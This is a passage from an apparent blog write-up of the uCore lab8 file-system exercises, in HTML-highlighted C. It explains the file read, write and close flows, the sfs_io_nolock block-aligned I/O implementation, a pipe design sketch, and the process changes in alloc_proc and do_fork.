Start from</span></span><br><span class="line"><span class="comment">         * the current directory, and use the whole thing as the subpath.</span></span><br><span class="line"><span class="comment">         * */</span></span><br><span class="line">        *subpath = path;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">vfs_get_curdir</span>(node_store);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (colon &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">/* device:path - get root of device&#x27;s filesystem */</span></span><br><span class="line">        path[colon] = <span class="string">&#x27;\0&#x27;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* device:/path - skip slash, treat as device:path */</span></span><br><span class="line">        <span class="keyword">while</span> (path[++ colon] == <span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">          *subpath = path + colon;</span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">vfs_get_root</span>(path, node_store);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* *</span></span><br><span class="line"><span class="comment">     * we have either /path or :path</span></span><br><span class="line"><span class="comment">     * /path is a path relative to the root of the &quot;boot filesystem&quot;</span></span><br><span class="line"><span class="comment">     * :path is a path relative to the root of the current filesystem</span></span><br><span class="line"><span class="comment">     * */</span></span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">if</span> (*path == <span 
class="string">&#x27;/&#x27;</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">vfs_get_bootfs</span>(node_store)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">return</span> ret;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">assert</span>(*path == <span class="string">&#x27;:&#x27;</span>);</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">inode</span> *node;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">vfs_get_curdir</span>(&amp;node)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">return</span> ret;</span><br><span class="line">        <span class="comment">/* The current directory may not be a device, so it must have a fs. */</span></span><br><span class="line">        <span class="built_in">assert</span>(node-&gt;in_fs != <span class="literal">NULL</span>);</span><br><span class="line">        *node_store = <span class="built_in">fsop_get_root</span>(node-&gt;in_fs);</span><br><span class="line">        <span class="built_in">vop_ref_dec</span>(node);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* ///... or :/... 
*/</span></span><br><span class="line">    <span class="keyword">while</span> (*(++ path) == <span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">    *subpath = path;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>After that, the function calls <code>vop_lookup</code> (which is actually <code>sfs_lookup</code>) to obtain the target node.</p></li></ul></li><li><p><code>vop_truncate</code> (i.e. <code>sfs_truncfile</code>) mainly does the following:</p><ul><li><p>Get the number of disk blocks the file currently occupies, <code>nblks</code>, and the number of blocks it will occupy after the &quot;truncation&quot;, <code>tblks</code>.</p><blockquote><p>Note that this operation can shrink the file as well as grow it. &quot;Truncation&quot; here really means resizing the file.</p></blockquote></li><li><p>If the file currently occupies fewer blocks than the target, loop over <code>sfs_bmap_load_nolock</code>, adding one block per call.</p></li><li><p>If the file currently occupies more blocks than the target, loop over <code>sfs_bmap_truncate_nolock</code>, freeing one block per call.</p></li></ul><blockquote><p>Both operations need to set the <code>dirtybit</code>.</p></blockquote></li></ul></li></ul><h4 id="e-文件读取流程">e. File read flow</h4><ul><li><p>When a user process calls <code>read</code>, the system call eventually reaches <code>sysfile_read</code>, which mainly does the following:</p><ul><li>Check that the file to be read has <strong>read permission</strong>.</li><li>Allocate a buffer in the kernel.</li><li>Repeatedly call <code>file_read</code> to read data into that buffer, then copy the data from the buffer to user memory (the memory pointed to by the <code>base</code> pointer passed to <code>sysfile_read</code>).</li></ul></li><li><p><code>file_read</code> is the file-reading function provided by the kernel. It uses the I/O buffer data structure <code>iobuf</code>, which is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * iobuf is a buffer Rd/Wr status record</span></span><br><span class="line"><span class="comment"> */</span></span><br><span 
class="line"><span class="keyword">struct</span> <span class="title class_">iobuf</span> &#123;</span><br><span class="line">    <span class="type">void</span> *io_base;     <span class="comment">// memory address of the IO buffer</span></span><br><span class="line">    <span class="type">off_t</span> io_offset;   <span class="comment">// current read/write offset</span></span><br><span class="line">    <span class="type">size_t</span> io_len;     <span class="comment">// size of the buffer</span></span><br><span class="line">    <span class="type">size_t</span> io_resid;   <span class="comment">// remaining space not yet read/written</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p><code>file_read</code> first initializes an I/O buffer and then calls <code>vop_read</code> to read data into it. <code>vop_read</code> in turn calls <code>sfs_io</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// read file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_read</span><span class="params">(<span class="type">int</span> fd, <span class="type">void</span> *base, <span class="type">size_t</span> len, <span class="type">size_t</span> *copied_store)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> 
ret;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">file</span> *file;</span><br><span class="line">    *copied_store = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">fd2file</span>(fd, &amp;file)) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    <span class="keyword">if</span> (!file-&gt;readable)</span><br><span class="line">        <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">    <span class="built_in">fd_array_acquire</span>(file);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">iobuf</span> __iob, *iob = <span class="built_in">iobuf_init</span>(&amp;__iob, base, len, file-&gt;pos);</span><br><span class="line">    ret = <span class="built_in">vop_read</span>(file-&gt;node, iob);</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> copied = <span class="built_in">iobuf_used</span>(iob);</span><br><span class="line">    <span class="keyword">if</span> (file-&gt;status == FD_OPENED)</span><br><span class="line">        file-&gt;pos += copied;</span><br><span class="line">    *copied_store = copied;</span><br><span class="line">    <span class="built_in">fd_array_release</span>(file);</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>sfs_io</code> is a <code>wrapper</code> around <code>sfs_io_nolock</code>: it takes the inode lock and then calls <code>sfs_io_nolock</code>.</p><p>Note the skip it performs on the buffer: after the call, <code>alen</code> holds the number of bytes actually read or written, and if it is non-zero, <code>iobuf_skip</code> advances the buffer past that data so that the next read or write continues right after it.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * sfs_io - Rd/Wr file. the wrapper of sfs_io_nolock</span></span><br><span class="line"><span class="comment">            with lock protect</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">sfs_io</span><span class="params">(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> iobuf *iob, <span class="type">bool</span> write)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sfs_fs</span> *sfs = <span class="built_in">fsop_info</span>(<span class="built_in">vop_fs</span>(node), sfs);</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sfs_inode</span> *sin = <span class="built_in">vop_info</span>(node, sfs_inode);</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="built_in">lock_sin</span>(sin);</span><br><span class="line">    &#123;</span><br><span class="line">        <span 
class="type">size_t</span> alen = iob-&gt;io_resid;</span><br><span class="line">        ret = <span class="built_in">sfs_io_nolock</span>(sfs, sin, iob-&gt;io_base, iob-&gt;io_offset, &amp;alen, write);</span><br><span class="line">        <span class="comment">// alen now holds the number of bytes actually read/written;</span></span><br><span class="line">        <span class="comment">// if it is non-zero, advance the iobuf past that data</span></span><br><span class="line">        <span class="keyword">if</span> (alen != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">iobuf_skip</span>(iob, alen);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">unlock_sin</span>(sin);</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><code>sfs_io_nolock</code> is covered in detail in Exercise 1.</p></li></ul><h4 id="f-文件写入流程">f. File write flow</h4><p>The file write flow is almost identical to the file read flow. Its call chain is</p><p><code>sysfile_write -&gt; file_write -&gt; vop_write -&gt; sfs_io -&gt; ...</code></p><p>so it is not repeated here.</p><h4 id="g-文件关闭流程">g. 
File close flow</h4><ul><li><p>First, <code>sysfile_close</code> calls <code>file_close</code> directly, which in turn calls <code>fd_array_close</code> so that the current <code>file</code> is closed in the <code>files_struct</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// close file</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">file_close</span><span class="params">(<span class="type">int</span> fd)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">file</span> *file;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">fd2file</span>(fd, &amp;file)) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> ret;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">fd_array_close</span>(file);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>In <code>fd_array_close</code>, if the file's open count drops to 0 after being decremented, <code>fd_array_free</code> is called to release the resources held by the file.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// fd_array_close - file&#x27;s open_count--; if file&#x27;s open_count-- == 0 , then call fd_array_free to free this file item</span></span><br><span class="line"><span class="function"><span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">fd_array_close</span><span class="params">(<span class="keyword">struct</span> file *file)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(file-&gt;status == FD_OPENED);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">fopen_count</span>(file) &gt; <span class="number">0</span>);</span><br><span class="line">    file-&gt;status = FD_CLOSED;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">fopen_count_dec</span>(file) == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">fd_array_free</span>(file);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><code>fd_array_free</code> then calls <code>vfs_close</code>, which in turn calls <code>inode_ref_dec</code> and <code>inode_open_dec</code> to decrement the file's reference count and open count.</p><ul><li>When the <strong>reference count</strong> reaches 0, <code>inode_ref_dec</code> calls <code>vop_reclaim</code> (i.e. <code>sfs_reclaim</code>) to release all data associated with the corresponding <code>inode</code> structure.</li><li>When the <strong>open count</strong> reaches 0, <code>inode_open_dec</code> calls <code>vop_close</code> (i.e. <code>sfs_close</code>) to write the corresponding <code>inode</code> back to disk.</li></ul><blockquote><p>These two functions treat the inode slightly differently; read them alongside the source code for the details.</p></blockquote><blockquote><p>I won't go any deeper here; there is simply too much to cover.</p></blockquote></li></ul><h2 id="练习解答">Exercise Solutions</h2><h3 id="0-练习0">0) Exercise 0</h3><blockquote><p>Fill in the existing labs</p></blockquote><p>Exercise 0 needs no other code changes this time: just port the code from the earlier labs into the corresponding places in the lab8 source.</p><h3 id="1-练习1">1) 
Exercise 1</h3><blockquote><p><strong>Implement the file read operation</strong></p><p>First understand how opening a file is handled, then, following the analysis of the file read/write process later in this lab, write the code in sfs_io_nolock in sfs_inode.c that reads data from a file.</p></blockquote><p>For the file handling flow, see <a href="#9-uCore%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F%E5%AE%9E%E7%8E%B0">uCore file system implementation</a> above.</p><p>Every file read or write in uCore eventually reaches <code>sfs_io_nolock</code>. In this function we have to read and write the data of the underlying blocks on the device.</p><p>Before reading or writing, we first align the data to block boundaries so that whole blocks can be handled with <code>sfs_block_op</code>, which makes the transfer more efficient.</p><p>Aligning the data raises one issue, though:</p><ul><li><p>The leading part of the data may sit at the end of the first block.</p></li><li><p>The trailing part of the data may sit at the start of the last block.</p></li></ul><p>The <strong>first</strong> and <strong>last</strong> blocks therefore have to be read/written separately, because <strong>only part of each of these two blocks is involved</strong>. The data in between is already block-aligned, so it can be read/written directly with <code>sfs_block_op</code>. The implementation is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span 
class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span 
class="line">100</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*  </span></span><br><span class="line"><span class="comment"> * sfs_io_nolock - Rd/Wr a file content from offset position to offset + length  disk blocks&lt;--&gt;buffer (in memory)</span></span><br><span class="line"><span class="comment"> * @sfs:      sfs file system</span></span><br><span class="line"><span class="comment"> * @sin:      sfs inode in memory</span></span><br><span class="line"><span class="comment"> * @buf:      the buffer Rd/Wr</span></span><br><span class="line"><span class="comment"> * @offset:   the offset of file</span></span><br><span class="line"><span class="comment"> * @alenp:    the length to Rd/Wr (is a pointer); on return it holds the length actually Rd/Wr</span></span><br><span class="line"><span class="comment"> * @write:    BOOL, 0 read, 1 write</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">sfs_io_nolock</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="keyword">struct</span> sfs_inode *sin, <span class="type">void</span> *buf, <span class="type">off_t</span> offset, <span class="type">size_t</span> *alenp, <span class="type">bool</span> write)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sfs_disk_inode</span> *din = sin-&gt;din;</span><br><span class="line">    <span class="built_in">assert</span>(din-&gt;type != SFS_TYPE_DIR);</span><br><span class="line">  <span class="comment">// calculate the Rd/Wr end position</span></span><br><span class="line">    <span class="comment">// compute the position at which this read/write ends</span></span><br><span class="line">    <span class="type">off_t</span> endpos = offset + *alenp, 
blkoff;</span><br><span class="line">    *alenp = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">if</span> (offset &lt; <span class="number">0</span> || offset &gt;= SFS_MAX_FILE_SIZE || offset &gt; endpos)</span><br><span class="line">        <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">    <span class="comment">// offset equals the end position, i.e. 0 bytes are to be read/written</span></span><br><span class="line">    <span class="keyword">if</span> (offset == endpos) &#123;</span><br><span class="line">        <span class="comment">// return immediately</span></span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (endpos &gt; SFS_MAX_FILE_SIZE)</span><br><span class="line">        endpos = SFS_MAX_FILE_SIZE;</span><br><span class="line">    <span class="keyword">if</span> (!write) &#123;</span><br><span class="line">        <span class="comment">// when reading, an offset at or beyond the end of the file leaves nothing to read</span></span><br><span class="line">        <span class="keyword">if</span> (offset &gt;= din-&gt;size) &#123;</span><br><span class="line">            <span class="comment">// return immediately with 0 bytes read</span></span><br><span class="line">            <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (endpos &gt; din-&gt;size)</span><br><span class="line">            endpos = din-&gt;size;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// select the function pointers that match the operation (read or write)</span></span><br><span class="line">    <span class="built_in">int</span> (*sfs_buf_op)(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">size_t</span> len, <span class="type">uint32_t</span> blkno, <span class="type">off_t</span> offset);</span><br><span 
class="line">    <span class="built_in">int</span> (*sfs_block_op)(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">uint32_t</span> blkno, <span class="type">uint32_t</span> nblks);</span><br><span class="line">    <span class="keyword">if</span> (write)</span><br><span class="line">        sfs_buf_op = sfs_wbuf, sfs_block_op = sfs_wblock;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        sfs_buf_op = sfs_rbuf, sfs_block_op = sfs_rblock;</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret = <span class="number">0</span>;</span><br><span class="line">    <span class="type">size_t</span> size, alen = <span class="number">0</span>;</span><br><span class="line">    <span class="type">uint32_t</span> ino;</span><br><span class="line">    <span class="type">uint32_t</span> blkno = offset / SFS_BLKSIZE;          <span class="comment">// The NO. of Rd/Wr begin block</span></span><br><span class="line">    <span class="type">uint32_t</span> nblks = endpos / SFS_BLKSIZE - blkno;  <span class="comment">// The size of Rd/Wr blocks</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">//LAB8:EXERCISE1 YOUR CODE HINT: call sfs_bmap_load_nolock, sfs_rbuf, sfs_rblock,etc. read different kind of blocks in file</span></span><br><span class="line">  <span class="comment">/*</span></span><br><span class="line"><span class="comment">   * (1) If offset isn&#x27;t aligned with the first block, Rd/Wr some content from offset to the end of the first block</span></span><br><span class="line"><span class="comment">   *       NOTICE: useful function: sfs_bmap_load_nolock, sfs_buf_op</span></span><br><span class="line"><span class="comment">   *               Rd/Wr size = (nblks != 0) ? 
(SFS_BLKSIZE - blkoff) : (endpos - offset)</span></span><br><span class="line"><span class="comment">   * (2) Rd/Wr aligned blocks</span></span><br><span class="line"><span class="comment">   *       NOTICE: useful function: sfs_bmap_load_nolock, sfs_block_op</span></span><br><span class="line"><span class="comment">   * (3) If end position isn&#x27;t aligned with the last block, Rd/Wr some content from begin to the (endpos % SFS_BLKSIZE) of the last block</span></span><br><span class="line"><span class="comment">   *       NOTICE: useful function: sfs_bmap_load_nolock, sfs_buf_op</span></span><br><span class="line"><span class="comment">  */</span></span><br><span class="line">    <span class="comment">// Unaligned start: if offset is not aligned to the first block, read/write the tail of the first block first</span></span><br><span class="line">    <span class="keyword">if</span> ((blkoff = offset % SFS_BLKSIZE) != <span class="number">0</span>) &#123;</span><br><span class="line">        size = (nblks != <span class="number">0</span>) ? (SFS_BLKSIZE - blkoff) : (endpos - offset);</span><br><span class="line">        <span class="comment">// get the disk block number `ino` that backs the first block</span></span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_bmap_load_nolock</span>(sfs, sin, blkno, &amp;ino)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        <span class="comment">// using the `ino` obtained above, read/write the tail part of the first block</span></span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_buf_op</span>(sfs, buf, size, ino, blkoff)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        alen += size;</span><br><span class="line">        <span class="keyword">if</span> (nblks == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> 
out;</span><br><span class="line">        buf += size, blkno ++, nblks --;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// read/write the block-aligned data in a loop</span></span><br><span class="line">    size = SFS_BLKSIZE;</span><br><span class="line">    <span class="keyword">while</span> (nblks != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// get the disk block number that the inode maps to this block</span></span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_bmap_load_nolock</span>(sfs, sin, blkno, &amp;ino)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        <span class="comment">// read/write one whole block per iteration</span></span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_block_op</span>(sfs, buf, ino, <span class="number">1</span>)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        alen += size, buf += size, blkno ++, nblks --;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Unaligned end: if the end position is not aligned to the last block, read/write the head of the last block</span></span><br><span class="line">    <span class="keyword">if</span> ((size = endpos % SFS_BLKSIZE) != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_bmap_load_nolock</span>(sfs, sin, blkno, &amp;ino)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> out;</span><br><span class="line">        <span class="keyword">if</span> ((ret = <span class="built_in">sfs_buf_op</span>(sfs, buf, size, ino, <span class="number">0</span>)) != <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">goto</span> 
out;</span><br><span class="line">        alen += size;</span><br><span class="line">    &#125;</span><br><span class="line">out:</span><br><span class="line">    *alenp = alen;</span><br><span class="line">    <span class="keyword">if</span> (offset + alen &gt; sin-&gt;din-&gt;size) &#123;</span><br><span class="line">        sin-&gt;din-&gt;size = offset + alen;</span><br><span class="line">        sin-&gt;dirty = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>Give an outline design for implementing the "UNIX PIPE mechanism"</p></blockquote><ul><li>Pipes are one of the more important forms of inter-process communication. Within the VFS, the simplest approach is to create a pipe buffer file <code>pipe_tmp</code> on disk. Then, once a process that has <code>pipe_tmp</code> open forks a child, parent and child can communicate by reading and writing the same file.</li><li>In practice, this form of communication is very inefficient: every file read or write goes through several layers of function calls, and disk throughput is far lower than memory throughput. Because the virtual file system (VFS) sits between the user and the actual file system, we can instead create a virtual pipe buffer file in memory that follows the file system interface and use it in place of the on-disk buffer file, which greatly increases communication speed.</li></ul><h3 id="2-练习2">2) Exercise 2</h3><blockquote><p><strong>Implement the mechanism for executing programs from the file system</strong></p></blockquote><p>To execute programs from the file system, code has to be added in three functions: <code>alloc_proc</code>, <code>do_fork</code> and <code>load_icode</code>.</p><ul><li><p><code>alloc_proc</code></p><ul><li><p>This function needs the smallest change: just add the initialization of <code>struct files_struct *filesp</code>.</p></li><li><p>The modified source is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> 
*</span><br><span class="line"><span class="built_in">alloc_proc</span>(<span class="type">void</span>) &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc = <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="keyword">struct</span> proc_struct));</span><br><span class="line">    <span class="keyword">if</span> (proc != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="comment">// Lab7 code</span></span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">//LAB8:EXERCISE2 YOUR CODE HINT:need add some code to init fs in proc_struct, ...</span></span><br><span class="line">        <span class="comment">// LAB8: initialize the filesp pointer</span></span><br><span class="line">        proc-&gt;filesp = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> proc;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p><code>do_fork</code></p><ul><li><p>On top of the lab7 version, fork additionally copies the <code>files_struct</code> structure and undoes that copy when a later step fails.</p><p>These two steps call <code>copy_files</code> and <code>put_files</code> respectively.</p></li><li><p>The modified source is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span 
class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_fork</span><span class="params">(<span class="type">uint32_t</span> clone_flags, <span class="type">uintptr_t</span> stack, <span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> ret = -E_NO_FREE_PROC;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc;</span><br><span class="line">    <span class="keyword">if</span> (nr_process &gt;= MAX_PROCESS) &#123;</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    &#125;</span><br><span class="line">    ret = -E_NO_MEM;</span><br><span class="line">    <span 
